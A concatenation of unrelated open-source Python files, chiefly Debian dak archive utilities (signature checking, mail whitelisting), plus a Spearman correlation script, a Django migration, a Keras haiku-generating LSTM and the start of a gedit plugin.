return files
################################################################################
# see http://bugs.debian.org/619131
def build_package_list(dsc, session = None):
if not dsc.has_key("package-list"):
return {}
packages = {}
for line in dsc["package-list"].split("\n"):
if not line:
break
fields = line.split()
name = fields[0]
package_type = fields[1]
(section, component) = extract_component_from_section(fields[2])
priority = fields[3]
# Validate type if we have a session
if session and get_override_type(package_type, session) is None:
# Maybe just warn and ignore? exit(1) might be a bit hard...
utils.fubar("invalid type (%s) in Package-List." % (package_type))
if name not in packages or packages[name]["type"] == "dsc":
packages[name] = dict(priority=priority, section=section, type=package_type, component=component, files=[])
return packages
################################################################################
def send_mail (message, filename=""):
"""sendmail wrapper, takes _either_ a message string or a file as arguments"""
# Check whether we're supposed to be sending mail
if Cnf.has_key("Dinstall::Options::No-Mail") and Cnf["Dinstall::Options::No-Mail"]:
return
# If we've been passed a string dump it into a temporary file
if message:
(fd, filename) = tempfile.mkstemp()
os.write (fd, message)
os.close (fd)
if Cnf.has_key("Dinstall::MailWhiteList") and \
Cnf["Dinstall::MailWhiteList"] != "":
message_in = open_file(filename)
message_raw = modemail.message_from_file(message_in)
message_in.close();
whitelist = [];
whitelist_in = open_file(Cnf["Dinstall::MailWhiteList"])
try:
for line in whitelist_in:
if not re_whitespace_comment.match(line):
if re_re_mark.match(line):
whitelist.append(re.compile(re_re_mark.sub("", line.strip(), 1)))
else:
whitelist.append(re.compile(re.escape(line.strip())))
finally:
whitelist_in.close()
# Fields to check.
fields = ["To", "Bcc", "Cc"]
for field in fields:
# Check each field
value = message_raw.get(field, None)
if value != None:
match = [];
for item in value.split(","):
(rfc822_maint, rfc2047_maint, name, email) = fix_maintainer(item.strip())
mail_whitelisted = 0
for wr in whitelist:
if wr.match(email):
mail_whitelisted = 1
break
if not mail_whitelisted:
print "Skipping %s since it's not in %s" % (item, Cnf["Dinstall::MailWhiteList"])
continue
match.append(item)
# Doesn't have any mail in whitelist so remove the header
if len(match) == 0:
del message_raw[field]
else:
message_raw.replace_header(field, ', '.join(match))
# Change message fields in order if we don't have a To header
if not message_raw.has_key("To"):
fields.reverse()
for field in fields:
if message_raw.has_key(field):
message_raw[fields[-1]] = message_raw[field]
del message_raw[field]
break
else:
# Clean up any temporary files
# and return, as we removed all recipients.
if message:
os.unlink (filename);
return;
fd = os.open(filename, os.O_RDWR|os.O_EXCL, 0o700);
os.write (fd, message_raw.as_string(True));
os.close (fd);
# Invoke sendmail
(result, output) = commands.getstatusoutput("%s < %s" % (Cnf["Dinstall::SendmailCommand"], filename))
if (result != 0):
raise SendmailFailedError(output)
# Clean up any temporary files
if message:
os.unlink (filename)
################################################################################
def poolify (source, component):
if component:
component += '/'
if source[:3] == "lib":
return component + source[:4] + '/' + source + '/'
else:
return component + source[:1] + '/' + source + '/'
################################################################################
def move (src, dest, overwrite = 0, perms = 0o664):
if os.path.exists(dest) and os.path.isdir(dest):
dest_dir = dest
else:
dest_dir = os.path.dirname(dest)
if not os.path.exists(dest_dir):
umask = os.umask(00000)
os.makedirs(dest_dir, 0o2775)
os.umask(umask)
#print "Moving %s to %s..." % (src, dest)
if os.path.exists(dest) and os.path.isdir(dest):
dest += '/' + os.path.basename(src)
# Don't overwrite unless forced to
if os.path.exists(dest):
if not overwrite:
fubar("Can't move %s to %s - file already exists." % (src, dest))
else:
if not os.access(dest, os.W_OK):
fubar("Can't move %s to %s - can't write to existing file." % (src, dest))
shutil.copy2(src, dest)
os.chmod(dest, perms)
os.unlink(src)
def copy (src, dest, overwrite = 0, perms = 0o664):
if os.path.exists(dest) and os.path.isdir(dest):
dest_dir = dest
else:
dest_dir = os.path.dirname(dest)
if not os.path.exists(dest_dir):
umask = os.umask(00000)
os.makedirs(dest_dir, 0o2775)
os.umask(umask)
#print "Copying %s to %s..." % (src, dest)
if os.path.exists(dest) and os.path.isdir(dest):
dest += '/' + os.path.basename(src)
# Don't overwrite unless forced to
if os.path.exists(dest):
if not overwrite:
raise FileExistsError
else:
if not os.access(dest, os.W_OK):
raise CantOverwriteError
shutil.copy2(src, dest)
os.chmod(dest, perms)
################################################################################
def where_am_i ():
res = socket.getfqdn()
database_hostname = Cnf.get("Config::" + res + "::DatabaseHostname")
if database_hostname:
return database_hostname
else:
return res
def which_conf_file ():
if os.getenv('DAK_CONFIG'):
return os.getenv('DAK_CONFIG')
res = socket.getfqdn()
# In case we allow local config files per user, try if one exists
if Cnf.find_b("Config::" + res + "::AllowLocalConfig"):
homedir = os.getenv("HOME")
confpath = os.path.join(homedir, "/etc/dak.conf")
if os.path.exists(confpath):
apt_pkg.ReadConfigFileISC(Cnf,confpath)
# We are still in here, so there is no local config file or we do
# not allow local files. Do the normal stuff.
if Cnf.get("Config::" + res + "::DakConfig"):
return Cnf["Config::" + res + "::DakConfig"]
return default_config
def which_apt_conf_file ():
res = socket.getfqdn()
# In case we allow local config files per user, try if one exists
if Cnf.find_b("Config::" + res + "::AllowLocalConfig"):
homedir = os.getenv("HOME")
confpath = os.path.join(homedir, "/etc/dak.conf")
if os.path.exists(confpath):
apt_pkg.ReadConfigFileISC(Cnf,default_config)
if Cnf.get("Config::" + res + "::AptConfig"):
return Cnf["Config::" + res + "::AptConfig"]
else:
return default_apt_config
def which_alias_file():
hostname = socket.getfqdn()
aliasfn = '/var/lib/misc/'+hostname+'/forward-alias'
if os.path.exists(aliasfn):
return aliasfn
else:
return None
################################################################################
def TemplateSubst(subst_map, filename):
""" Perform a substition of template """
templatefile = open_file(filename)
template = templatefile.read()
for k, v in subst_map.iteritems():
template = template.replace(k, str(v))
templatefile.close()
return template
################################################################################
def fubar(msg, exit_code=1):
sys.stderr.write("E: %s\n" % (msg))
sys.exit(exit_code)
def warn(msg):
sys.stderr.write("W: %s\n" % (msg))
################################################################################
# Returns the user name with a laughable attempt at rfc822 conformancy
# (read: removing stray periods).
def whoami ():
return pwd.getpwuid(os.getuid())[4].split(',')[0].replace('.', '')
def getusername ():
return pwd.getpwuid(os.getuid())[0]
################################################################################
def size_type (c):
t = " B"
if c > 10240:
c = c / 1024
t = " KB"
if c > 10240:
c = c / 1024
t = " MB"
return ("%d%s" % (c, t))
################################################################################
def cc_fix_changes (changes):
o = changes.get("architecture", "")
if o:
del changes["architecture"]
changes["architecture"] = {}
for j in o.split():
changes["architecture"][j] = 1
def changes_compare (a, b):
""" Sort by source name, source version, 'have source', and then by filename """
try:
a_changes = parse_changes(a)
except:
return -1
try:
b_changes = parse_changes(b)
except:
return 1
cc_fix_changes (a_changes)
cc_fix_changes (b_changes)
# Sort by source name
a_source = a_changes.get("source")
b_source = b_changes.get("source")
q = cmp (a_source, b_source)
if q:
return q
# Sort by source version
a_version = a_changes.get("version", "0")
b_version = b_changes.get("version", "0")
q = apt_pkg.version_compare(a_version, b_version)
if q:
return q
# Sort by 'have source'
a_has_source = a_changes["architecture"].get("source")
b_has_source = b_changes["architecture"].get("source")
if a_has_source and not b_has_source:
return -1
elif b_has_source and not a_has_source:
return 1
# Fall back to sort by filename
return cmp(a, b)
################################################################################
def find_next_free (dest, too_many=100):
extra = 0
orig_dest = dest
while os.path.exists(dest) and extra < too_many:
dest = orig_dest + '.' + repr(extra)
extra += 1
if extra >= too_many:
raise NoFreeFilenameError
return dest
################################################################################
def result_join (original, sep = '\t'):
resultlist = []
for i in xrange(len(original)):
if original[i] == None:
resultlist.append("")
else:
resultlist.append(original[i])
return sep.join(resultlist)
################################################################################
def prefix_multi_line_string(str, prefix, include_blank_lines=0):
out = ""
for line in str.split('\n'):
line = line.strip()
if line or include_blank_lines:
out += "%s%s\n" % (prefix, line)
# Strip trailing new line
if out:
out = out[:-1]
return out
################################################################################
def validate_changes_file_arg(filename, require_changes=1):
"""
'filename' is either a .changes or .dak file. If 'filename' is a
.dak file, it's changed to be the corresponding .changes file. The
function then checks if the .changes file a) exists and b) is
readable and returns the .changes filename if so. If there's a
problem, the next action depends on the option 'require_changes'
argument:
- If 'require_changes' == -1, errors are ignored and the .changes
filename is returned.
- If 'require_changes' == 0, a warning is given and 'None' is returned.
- If 'require_changes' == 1, a fatal error is raised.
"""
error = None
orig_filename = filename
if filename.endswith(".dak"):
filename = filename[:-4]+".changes"
if not filename.endswith(".changes"):
error = "invalid file type; not a changes file"
else:
if not os.access(filename,os.R_OK):
if os.path.exists(filename):
error = "permission denied"
else:
error = "file not found"
if error:
if require_changes == 1:
fubar("%s: %s." % (orig_filename, error))
elif require_changes == 0:
warn("Skipping %s - %s" % (orig_filename, error))
return None
else: # We only care about the .dak file
return filename
else:
return filename
################################################################################
def real_arch(arch):
return (arch != "source" and arch != "all")
################################################################################
def join_with_commas_and(list):
if len(list) == 0: return "nothing"
if len(list) == 1: return list[0]
return ", ".join(list[:-1]) + " and " + list[-1]
################################################################################
def pp_deps (deps):
pp_deps = []
for atom in deps:
(pkg, version, constraint) = atom
if constraint:
pp_dep = "%s (%s %s)" % (pkg, constraint, version)
else:
pp_dep = pkg
pp_deps.append(pp_dep)
return " |".join(pp_deps)
################################################################################
def get_conf():
return Cnf
################################################################################
def parse_args(Options):
""" Handle -a, -c and -s arguments; returns them as SQL constraints """
# XXX: This should go away and everything which calls it be converted
# to use SQLA properly. For now, we'll just fix it not to use
# the old Pg interface though
session = DBConn().session()
# Process suite
if Options["Suite"]:
suite_ids_list = []
for suitename in split_args(Options["Suite"]):
suite = get_suite(suitename, session=session)
if not suite or suite.suite_id is None:
warn("suite '%s' not recognised." % (suite and suite.suite_name or suitename))
else:
suite_ids_list.append(suite.suite_id)
if suite_ids_list:
con_suites = "AND su.id IN (%s)" % ", ".join([ str(i) for i in suite_ids_list ])
else:
fubar("No valid suite given.")
else:
con_suites = ""
# Process component
if Options["Component"]:
component_ids_list = []
for componentname in split_args(Options["Component"]):
component = get_component(componentname, session=session)
if component is None:
warn("component '%s' not recognised." % (componentname))
else:
component_ids_list.append(component.component_id)
if component_ids_list:
con_components = "AND c.id IN (%s)" % ", ".join([ str(i) for i in component_ids_list ])
else:
fubar("No valid component given.")
else:
con_components = ""
# Process architecture
con_architectures = ""
check_source = 0
if Options["Architecture"]:
arch_ids_list = []
for archname in split_args(Options["Architecture"]):
if archname == "source":
check_source = 1
else:
arch = get_architecture(archname, session=session)
if arch is None:
warn("architecture '%s' not recognised." % (archname))
else:
arch_ids_list.append(arch.arch_id)
if arch_ids_list:
con_architectures = "AND a.id IN (%s)" % ", ".join([ str(i) for i in arch_ids_list ])
else:
if not check_source:
fubar("No valid architecture given.")
else:
check_source = 1
return (con_suites, con_architectures, con_components, check_source)
################################################################################
def arch_compare_sw (a, b):
"""
Function for use in sorting lists of architectures.
Sorts normally except that 'source' dominates all others.
"""
if a == "source" and b == "source":
return 0
elif a == "source":
return -1
elif b == "source":
return 1
return cmp (a, b)
################################################################################
def split_args (s, dwim=1):
"""
Split command line arguments which can be separated by either commas
or whitespace. If dwim is set, it will complain about string ending
in comma since this usually means someone did 'dak ls -a i386, m68k
foo' or something and the inevitable confusion resulting from 'm68k'
being treated as an argument is undesirable.
"""
if s.find(",") == -1:
return s.split()
else:
if s[-1:] == "," and dwim:
fubar("split_args: found trailing comma, spurious space maybe?")
return s.split(",")
################################################################################
def gpgv_get_status_output(cmd, status_read, status_write):
"""
Our very own version of commands.getouputstatus(), hacked to support
gpgv's status fd.
"""
cmd = ['/bin/sh', '-c', cmd]
p2cread, p2cwrite = os.pipe()
c2pread, c2pwrite = os.pipe()
errout, errin = os.pipe()
pid = os.fork()
if pid == 0:
# Child
os.close(0)
os.close(1)
os.dup(p2cread)
os.dup(c2pwrite)
os.close(2)
os.dup(errin)
for i in range(3, 256):
if i != status_write:
try:
os.close(i)
except:
pass
try:
os.execvp(cmd[0], cmd)
finally:
os._exit(1)
# Parent
os.close(p2cread)
os.dup2(c2pread, c2pwrite)
os.dup2(errout, errin)
output = status = ""
while 1:
i, o, e = select.select([c2pwrite, errin, status_read], [], [])
more_data = []
for fd in i:
r = os.read(fd, 8196)
if len(r) > 0:
more_data.append(fd)
if fd == c2pwrite or fd == errin:
output += r
elif fd == status_read:
status += r
else:
fubar("Unexpected file descriptor [%s] returned from select\n" % (fd))
if not more_data:
pid, exit_status = os.waitpid(pid, 0)
try:
os.close(status_write)
os.close(status_read)
os.close(c2pread)
os.close(c2pwrite)
os.close(p2cwrite)
os.close(errin)
os.close(errout)
except:
pass
break
return output, status, exit_status
################################################################################
def process_gpgv_output(status):
# Process the status-fd output
keywords = {}
internal_error = ""
for line in status.split('\n'):
line = line.strip()
if line == "":
continue
split = line.split()
if len(split) < 2:
internal_error += "gpgv status line is malformed (< 2 atoms) ['%s'].\n" % (line)
continue
(gnupg, keyword) = split[:2]
if gnupg != "[GNUPG:]":
internal_error += "gpgv status line is malformed (incorrect prefix '%s').\n" % (gnupg)
continue
args = split[2:]
if keywords.has_key(keyword) and keyword not in [ "NODATA", "SIGEXPIRED", "KEYEXPIRED" ]:
internal_error += "found duplicate status token ('%s').\n" % (keyword)
continue
else:
keywords[keyword] = args
return (keywords, internal_error)
################################################################################
def retrieve_key (filename, keyserver=None, keyring=None):
"""
Retrieve the key that signed 'filename' from 'keyserver' and
add it to 'keyring'. Returns nothing on success, or an error message
on error.
"""
# Defaults for keyserver and keyring
if not keyserver:
keyserver = Cnf["Dinstall::KeyServer"]
if not keyring:
keyring = get_primary_keyring_path()
# Ensure the filename contains no shell meta-characters or other badness
if not re_taint_free.match(filename):
return "%s: tainted filename" % (filename)
# Invoke gpgv on the file
status_read, status_write = os.pipe()
cmd = "gpgv --status-fd %s --keyring /dev/null %s" % (status_write, filename)
(_, status, _) = gpgv_get_status_output(cmd, status_read, status_write)
# Process the status-fd output
(keywords, internal_error) = process_gpgv_output(status)
if internal_error:
return internal_error
if not keywords.has_key("NO_PUBKEY"):
return "didn't find expected NO_PUBKEY in gpgv status-fd output"
fingerprint = keywords["NO_PUBKEY"][0]
# XXX - gpg sucks. You can't use --secret-keyring=/dev/null as
# it'll try to create a lockfile in /dev. A better solution might
# be a tempfile or something.
cmd = "gpg --no-default-keyring --secret-keyring=%s --no-options" \
% (Cnf["Dinstall::SigningKeyring"])
cmd += " --keyring %s --keyserver %s --recv-key %s" \
% (keyring, keyserver, fingerprint)
(result, output) = commands.getstatusoutput(cmd)
if (result != 0):
return "'%s' failed with exit code %s" % (cmd, result)
return ""
################################################################################
def gpg_keyring_args(keyrings=None):
if not keyrings:
keyrings = get_active_keyring_paths()
return " ".join(["--keyring %s" % x for x in keyrings])
################################################################################
@session_wrapper
def check_signature (sig_filename, data_filename="", keyrings=None, autofetch=None, session=None):
"""
Check the signature of a file and return the fingerprint if the
signature is valid or 'None' if it's not. The first argument is the
filename whose signature should be checked. The second argument is a
reject function and is called when an error is found. The reject()
function must allow for two arguments: the first is the error message,
the second is an optional prefix string. It's possible for reject()
to be called more than once during an invocation of check_signature().
The third argument is optional and is the name of the files the
detached signature applies to. The fourth argument is optional and is
a *list* of keyrings to use. 'autofetch' can either be None, True or
False. If None, the default behaviour specified in the config will be
used.
"""
rejects = []
# Ensure the filename contains no shell meta-characters or other badness
if not re_taint_free.match(sig_filename):
rejects.append("!!WARNING!! tainted signature filename: '%s'." % (sig_filename))
return (None, rejects)
if data_filename and not re_taint_free.match(data_filename):
rejects.append("!!WARNING!! tainted data filename: '%s'." % (data_filename))
return (None, rejects)
if not keyrings:
keyrings = [ x.keyring_name for x in session.query(Keyring).filter(Keyring.active == True).all() ]
# Autofetch the signing key if that's enabled
if autofetch == None:
autofetch = Cnf.get("Dinstall::KeyAutoFetch")
if autofetch:
error_msg = retrieve_key(sig_filename)
if error_msg:
rejects.append(error_msg)
return (None, rejects)
# Build the command line
status_read, status_write = os.pipe()
cmd = "gpgv --status-fd %s %s %s %s" % (
status_write, gpg_keyring_args(keyrings), sig_filename, data_filename)
# Invoke gpgv on the file
(output, status, exit_status) = gpgv_get_status_output(cmd, status_read, status_write)
# Process the status-fd output
(keywords, internal_error) = process_gpgv_output(status)
# If we failed to parse the status-fd output, let's just whine and bail now
if internal_error:
rejects.append("internal error while performing signature check on %s." % (sig_filename))
rejects.append(internal_error, "")
rejects.append("Please report the above errors to the Archive maintainers by replying to this mail.", "")
return (None, rejects)
# Now check for obviously bad things in the processed output
if keywords.has_key("KEYREVOKED"):
rejects.append("The key used to sign %s has been revoked." % (sig_filename))
if keywords.has_key("BADSIG"):
rejects.append("bad signature on %s." % (sig_filename))
if keywords.has_key("ERRSIG") and not keywords.has_key("NO_PUBKEY"):
rejects.append("failed to check signature on %s." % (sig_filename))
if keywords.has_key("NO_PUBKEY"):
args = keywords["NO_PUBKEY"]
if len(args) >= 1:
key = args[0]
rejects.append("The key (0x%s) used to sign %s wasn't found in the keyring(s)." % (key, sig_filename))
if keywords.has_key("BADARMOR"):
rejects.append("ASCII armour of signature was corrupt in %s." % (sig_filename))
if keywords.has_key("NODATA"):
rejects.append("no signature found in %s." % (sig_filename))
if keywords.has_key("EXPKEYSIG"):
args = keywords["EXPKEYSIG"]
if len(args) >= 1:
key = args[0]
rejects.append("Signature made by expired key 0x%s" % (key))
if keywords.has_key("KEYEXPIRED") and not keywords.has_key("GOODSIG"):
args = keywords["KEYEXPIRED"]
expiredate=""
if len(args) >= 1:
timestamp = args[0]
if timestamp.count("T") == 0:
try:
expiredate = time.strftime("%Y-%m-%d", time.gmtime(float(timestamp)))
except ValueError:
expiredate = "unknown (%s)" % (timestamp)
else:
expiredate = timestamp
rejects.append("The key used to sign %s has expired on %s" % (sig_filename, expiredate))
if len(rejects) > 0:
return (None, rejects)
# Next check gpgv exited with a zero return code
if exit_status:
rejects.append("gpgv failed while checking %s." % (sig_filename))
if status.strip():
rejects.append(prefix_multi_line_string(status, " [GPG status-fd output:] "))
else:
rejects.append(prefix_multi_line_string(output, " [GPG output:] "))
return (None, rejects)
# Sanity check the good stuff we expect
if not keywords.has_key("VALIDSIG"):
rejects.append("signature on %s does not appear to be valid [No VALIDSIG]." % (sig_filename))
else:
args = keywords["VALIDSIG"]
if len(args) < 1:
rejects.append("internal error while checking signature on %s." % (sig_filename))
else:
fingerprint = args[0]
if not keywords.has_key("GOODSIG"):
rejects.append("signature on %s does not appear to be valid [No GOODSIG]." % (sig_filename))
if not keywords.has_key("SIG_ID"):
rejects.append("signature on %s does not appear to be valid [No SIG_ID]." % (sig_filename))
# Finally ensure there's not something we don't recognise
known_keywords = dict(VALIDSIG="",SIG_ID="",GOODSIG="",BADSIG="",ERRSIG="",
SIGEXPIRED="",KEYREVOKED="",NO_PUBKEY="",BADARMOR="",
NODATA="",NOTATION_DATA="",NOTATION_NAME="",KEYEXPIRED="",POLICY_URL="")
for keyword in keywords.keys():
if not known_keywords.has_key(keyword):
rejects.append("found unknown status token '%s' from gpgv with args '%r' in %s." % (keyword, keywords[keyword], sig_filename))
if len(rejects) > 0:
return (None, rejects)
else:
return (fingerprint, [])
################################################################################
def gpg_get_key_addresses(fingerprint):
"""retreive email addresses from gpg key uids for a given fingerprint"""
addresses = key_uid_email_cache.get(fingerprint)
if addresses != None:
return addresses
addresses = list()
cmd = "gpg --no-default-keyring %s --fingerprint %s" \
% (gpg_keyring_args(), fingerprint)
(result, output) = commands.getstatusoutput(cmd)
if result == 0:
for l in output.split('\n'):
m = re_gpg_uid.match(l)
if m:
addresses.append(m.group(1))
key_uid_email_cache[fingerprint] = addresses
return addresses
################################################################################
def clean_symlink (src, dest, root):
"""
Relativize an absolute symlink from 'src' -> 'dest' relative to 'root'.
Returns fixed 'src'
"""
src = src.replace(root, '', 1)
dest = dest.replace(root, '', 1)
dest = os.path.dirname(dest)
new_src = '../' * len(dest.split('/'))
return new_src + src
################################################################################
def temp_filename(directory=None, prefix="dak", suffix=""):
"""
Return a secure and unique filename by pre-creating it.
If 'directory' is non-null, it will be the directory the file is pre-created in.
If 'prefix' is non-null, the filename will be prefixed with it, default is dak.
If 'suffix' is non-null, the filename will end with it.
Returns a pair (fd, name).
"""
return tempfile.mkstemp(suffix, prefix, directory)
################################################################################
def temp_dirname(parent=None, prefix="dak", suffix=""):
"""
Return a secure and unique directory by pre-creating it.
If 'parent' is non-null, it will be the directory the directory is pre-created in.
If 'prefix' is non-null, the filename will be prefixed with it, default is dak.
If 'suffix' is non-null, the filename will end with it.
Returns a pathname to the new directory
"""
return tempfile.mkdtemp(suffix, prefix, parent)
################################################################################
def is_email_alias(email):
""" checks if the user part of the email is listed in the alias file """
global alias_cache
if alias_cache == None:
aliasfn = which_alias_file()
alias_cache = set()
if aliasfn:
for l in open(aliasfn):
alias_cache.add(l.split(':')[0])
uid = email.split('@')[0]
return uid in alias_cache
################################################################################
def get_changes_files(from_dir):
"""
Takes a directory and lists all .changes files in it (as well as chdir'ing
to the directory; this is due to broken behaviour on the part of p-u/p-a
when you're not in the right place)
Returns a list of filenames
"""
try:
# Much of the rest of p-u/p-a depends on being in the right place
os.chdir(from_dir)
changes_files = [x for x in os.listdir(from_dir) if x.endswith('.changes')]
except OSError as e:
fubar("Failed to read list from directory %s (%s)" % (from_dir, e))
return changes_files
################################################################################
apt_pkg.init()
Cnf = apt_pkg.Configuration()
if not os.getenv("DAK_TEST"):
apt_pkg.read_config_file_isc(Cnf,default_config)
if which_conf_file() != default_config:
apt_pkg.read_config_file_isc(Cnf,which_conf_file())
################################################################################
def parse_wnpp_bug_file(file = "/srv/ftp-master.debian.org/scripts/masterfiles/wnpp_rm"):
"""
Parses the wnpp bug list available at http://qa.debian.org/data/bts/wnpp_rm
Well, actually it parsed a local copy, but let's document the source
somewhere ;)
returns a dict associating source package name with a list of open wnpp
bugs (Yes, there might be more than one)
"""
line = []
try:
f = open(file)
lines = f.readlines()
except IOError as e:
print "Warning: Couldn't open %s; don't know about WNPP bugs, so won't close any." % file
lines = []
wnpp = {}
for line in lines:
splited_line = line.split(": ", 1)
if len(splited_line) > 1:
wnpp[splited_line[0]] = splited_line[1].split("|")
for source in wnpp.keys():
bugs = []
for wnpp_bug in wnpp[source]:
bug_no = re.search("(\d)+", wnpp_bug).group()
if bug_no:
bugs.append(bug_no)
wnpp[source] = bugs
return wnpp
################################################################################
def get_packages_from_ftp(root, suite, component, architecture):
"""
Returns an object containing apt_pkg-parseable data collected by
aggregating Packages.gz files gathered for each architecture.
@type root: string
@param root: path to ftp archive root directory
@type suite: string
@param suite: suite to extract files from
@type component: string
@param component: component to extract files from
@type architecture: string
@param architecture: architecture to extract files from
@rtype: TagFile
@return: apt_pkg class containing package data
"""
filename = "%s/dists/%s/%s/binary-%s/Packages.gz" % (root, suite, component, architecture)
(fd, temp_file) = temp_filename()
(result, output) = commands.getstatusoutput("gunzip -c %s > %s" % (filename, temp_file))
if (result != 0):
fubar("Gunzip invocation failed!\n%s\n" % (output), result)
filename = "%s/dists/%s/%s/debian-installer/binary-%s/Packages.gz" % (root, suite, component, architecture)
if os.path.exists(filename):
(result, output) = commands.getstatusoutput("gunzip -c %s >> %s" % (filename, temp_file))
if (result != 0):
fubar("Gunzip invocation failed!\n%s\n" % (output), result)
packages = open_file(temp_file)
Packages = apt_pkg.ParseTagFile(packages)
os.unlink(temp_file)
return Packages
################################################################################
def deb_extract_control(fh):
"""extract DEBIAN/control from a binary package"""
return apt_inst.DebFile(fh).control.extractdata("control")
################################################################################
def mail_addresses_for_upload(maintainer, changed_by, fingerprint):
"""Mail addresses to contact for an upload
Args:
maintainer (str): Maintainer field of the changes file
changed_by (str): Changed-By field of the changes file
fingerprint (str): Fingerprint of the PGP key used to sign the upload
Returns:
List of RFC 2047-encoded mail addresses to contact regarding this upload
"""
addresses = [maintainer]
if changed_by != maintainer:
addresses.append(changed_by)
fpr_addresses = gpg_get_key_addresses(fingerprint)
if fix_maintainer(changed_by)[3] not in fpr_addresses and fix_maintainer(maintainer)[3] not in fpr_addresses:
addresses.append(fpr_addresses[0])
encoded_addresses = [ fix_maintainer(e)[1] for e in addresses ]
return encoded_addresses
| luther07/dak | daklib/utils.py | Python | gpl-2.0 | 54,903 |
# need to pass it a file, where data starts, path to write
# things to import
import sys
import pandas
import scipy
import numpy
from scipy import stats
from scipy.stats import t
# arguments being passed
path_of_file=sys.argv[1]
last_metadata_column=int(sys.argv[2])
path_to_write=sys.argv[3]
# spearman p calc based on two tailed t-test
def spearmanp(r,n):
tstat=r*numpy.sqrt((n-2)/(1-r**2))
return t.cdf(-abs(tstat),n-2)*2
# read in the data
df=pandas.read_table(path_of_file,index_col=False)
# remove metadata columns
df_data_only=df.drop(df.columns[[range(0,last_metadata_column)]],axis=1)
#make correlation matrix
df_corr_matrix=df_data_only.corr(method="spearman")
#make column based on rows (called indexes in python)
df_corr_matrix["otus"]=df_corr_matrix.index
#melt dataframe but maintain indices now called otus
df_melt=pandas.melt(df_corr_matrix,id_vars="otus")
# remove NAs or NaNs which are result of non-existent otus (all 0 values)
df_melt=df_melt[numpy.isfinite(df_melt.value)]
df_melt['p.value']=spearmanp(df_melt.value,df_sub.shape[0])
#write the file
df_melt.to_csv(path_to_write,index=False)
| ryanjw/co-occurrence_python | first_attempt.py | Python | gpl-2.0 | 1,125 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('flyerapp', '0007_auto_20150629_1135'),
]
operations = [
migrations.AddField(
model_name='schedule',
name='logic_delete',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='flight',
name='pub_date',
field=models.DateTimeField(default=datetime.datetime(2015, 6, 30, 18, 59, 57, 180047), null=True, verbose_name=b'date published'),
),
migrations.AlterField(
model_name='schedule',
name='pub_date',
field=models.DateTimeField(default=datetime.datetime(2015, 6, 30, 18, 59, 57, 180807), null=True, verbose_name=b'date published'),
),
]
| luzeduardo/antonov225 | flyer/flyerapp/migrations/0008_auto_20150630_1859.py | Python | gpl-2.0 | 924 |
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Dropout
from keras.layers.recurrent import LSTM
from keras.preprocessing.sequence import pad_sequences
import numpy as np
import random, sys
'''
Example script to generate haiku Text.
It is recommended to run this script on GPU, as recurrent
networks are quite computationally intensive.
If you try this script on new data, make sure your corpus
has at least ~100k characters. ~1M is better.
'''
path = "haiku_all.txt"
text = open(path).read().lower()
print('corpus length:', len(text))
chars = set(text)
print('total chars:', len(chars))
char_indices = dict((c, i) for i, c in enumerate(chars))
indices_char = dict((i, c) for i, c in enumerate(chars))
# cut the text in semi-redundant sequences of maxlen characters
maxlen = 100
step = 3
sentences = []
next_chars = []
for i in range(0, len(text) - maxlen, step):
sentences.append(text[i : i + maxlen])
next_chars.append(text[i + maxlen])
print('nb sequences:', len(sentences))
print('Vectorization...')
X = np.zeros((len(sentences), maxlen, len(chars)), dtype=np.bool)
y = np.zeros((len(sentences), len(chars)), dtype=np.bool)
for i, sentence in enumerate(sentences):
for t, char in enumerate(sentence):
X[i, t, char_indices[char]] = 1
y[i, char_indices[next_chars[i]]] = 1
print "X.shape: %s, Y.shape: %s" % (X.shape, y.shape)
# build the model: 2 stacked LSTM
print('Build model...')
model = Sequential()
model.add(LSTM(len(chars), 512, return_sequences=False))
model.add(Dropout(0.2))
## Remove above 2 lines and replace by below 2 lines to make 2 layers LSTM.
#model.add(LSTM(len(chars), 512, return_sequences=True))
#model.add(Dropout(0.2))
#model.add(LSTM(512, 512, return_sequences=False))
#model.add(Dropout(0.2))
model.add(Dense(512, len(chars)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
# helper function to sample an index from a probability array
def sample(a, temperature=1.0):
a = np.log(a)/temperature
a = np.exp(a)/np.sum(np.exp(a))
return np.argmax(np.random.multinomial(1,a,1))
# train the model, output generated text after each iteration
def generate_from_model(model, begin_sent=None, diversity_l=[0.2, 0.5, 1.0, 1.2]):
if begin_sent is None:
start_index = random.randint(0, len(text) - maxlen - 1)
for diversity in diversity_l:
print
print '----- diversity:', diversity
generated = ''
if begin_sent is None:
sentence = text[start_index : start_index + maxlen]
else:
sentence = begin_sent
generated += sentence
print '----- Generating with seed: "' + sentence + '"'
sys.stdout.write(generated)
tot_lines = 0
tot_chars = 0
while True:
if tot_lines > 3 or tot_chars > 120:
break
x = np.zeros((1, maxlen, len(chars)))
for t, char in enumerate(sentence):
x[0, t, char_indices[char]] = 1.
preds = model.predict(x, verbose=0)[0]
next_index = sample(preds, diversity)
next_char = indices_char[next_index]
tot_chars += 1
generated += next_char
if next_char == '\t':
tot_lines += 1
sentence = sentence[1:] + next_char
sys.stdout.write(next_char)
sys.stdout.flush()
print ""
if __name__ == "__main__":
history = model.fit(X, y, batch_size=200, nb_epoch=20)
generate_from_model(model)
"""
for i in xrange(1,4):
history = model.fit(X, y, batch_size=100*i, nb_epoch=20)
generate_from_model(model)
"""
| napsternxg/haiku_rnn | haiku_gen.py | Python | gpl-2.0 | 3,766 |
# -*- coding: UTF-8 -*-
# Gedit External Tools plugin
# Copyright (C) 2005-2006 Steve Frécinaux <steve@istique.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
__all__ = ('ExternalToolsPlugin', 'Manager', 'OutputPanel', 'Capture', 'UniqueById')
from gi.repository import GLib, Gio, GObject, Gtk, Gedit, PeasGtk
from .manager import Manager
from .library import ToolLibrary
from .outputpanel import OutputPanel
from .capture import Capture
from .functions import *
class ToolMenu(object):
def __init__(self, library, window, panel, menu):
super(ToolMenu, self).__init__()
